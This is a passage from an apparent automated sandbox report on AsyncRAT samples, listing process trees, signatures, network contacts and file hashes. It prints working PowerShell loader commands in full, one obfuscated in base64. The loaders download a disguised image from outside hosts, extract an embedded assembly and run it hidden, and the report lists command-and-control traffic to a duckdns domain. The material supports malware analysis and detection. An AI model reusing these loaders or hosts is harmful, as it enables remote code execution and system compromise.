| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2232 wrote to memory of 2728 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2728 wrote to memory of 2388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBrDgTreG0DgTrebQBJDgTreGgDgTreRgDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreTQB1DgTreHMDgTreaQBjDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.dkmmIhF/selif/orp.dleihsonan//:sptth', '1', 'Music'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
memory/2728-4-0x000000001B590000-0x000000001B872000-memory.dmp
memory/2728-5-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-7-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-6-0x0000000001EA0000-0x0000000001EA8000-memory.dmp
memory/2728-8-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-9-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-10-0x0000000002C90000-0x0000000002D10000-memory.dmp
memory/2728-11-0x0000000002C90000-0x0000000002D10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIMO6ZYIYLL1WREG6CI1.temp
| MD5 | 8532661d6d819a85f21b22af4639a4ee |
| SHA1 | 27ea2be3ad7bc9deeccd32fb7e600d8cfe42a13d |
| SHA256 | 29391a67d6c631b21a16033c9d52e9ec0163800893423099d3b0ebb321a59341 |
| SHA512 | 0f0fd2af39d76c5f13618146e59955fbcb1a25e7c18c3d22ccb2aceb5668ded4c66286837f6aaa428cd27b96e1e6b8ad45cd074346eb5881240cb4ac630fb3ef |
memory/2388-17-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2388-18-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2388-21-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-20-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-22-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2388-23-0x0000000002CA0000-0x0000000002CEE000-memory.dmp
memory/2388-24-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
memory/2728-25-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
145s
Max time network
154s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3212 created 3428 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| US | 8.8.8.8:53 | kdfsv.duckdns.org | udp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
| GB | 154.30.255.175:8890 | kdfsv.duckdns.org | tcp |
Files
memory/3212-0-0x0000020434C20000-0x0000020434C42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vg4w4iwe.dma.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3212-10-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/3212-12-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-13-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-11-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-14-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/3212-15-0x0000020419EF0000-0x0000020419F4B000-memory.dmp
memory/3212-17-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/3212-18-0x00000204347D0000-0x000002043482B000-memory.dmp
memory/3212-16-0x00000204186A0000-0x00000204186B0000-memory.dmp
memory/4904-19-0x0000029EE1770000-0x0000029EE1786000-memory.dmp
memory/4904-20-0x0000029EE32B0000-0x0000029EE32C6000-memory.dmp
memory/4904-21-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-23-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-22-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-24-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/3212-27-0x00000204347D0000-0x000002043482B000-memory.dmp
memory/3212-28-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-29-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp
memory/4904-30-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp
memory/4904-31-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-32-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-33-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp
memory/4904-34-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240319-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 